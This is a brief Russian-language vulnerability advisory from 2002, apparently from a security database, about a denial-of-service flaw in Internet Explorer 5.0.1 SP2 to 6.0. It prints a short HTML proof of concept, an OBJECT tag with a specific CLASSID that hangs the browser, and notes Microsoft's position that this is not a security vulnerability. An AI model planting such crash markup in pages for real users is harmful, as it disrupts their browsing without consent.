DoS против Microsoft Internet Explorer

Дата публикации:
28.06.2002
Всего просмотров:
866
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Web страница, содержащая определенное значение CLASSID в тэге OBJECT, приведет к зависанию IE. Пример:
 
<!--  start dosIE-doe.html -->
<object ID="dosIE-doe" 
CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>
<!-- end dosIE-doe.html -->
Microsoft посчитала что этот недостаток не является уязвимостью защиты и сослалась на собственное определение, что такое уязвимость: http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp

Уязвимость обнаружена в Microsoft Internet Explorer 5.0.1 SP2-6.0

Ссылки: A DoS against IE in W2K and XP? You Make the Call...

или введите имя

CAPTCHA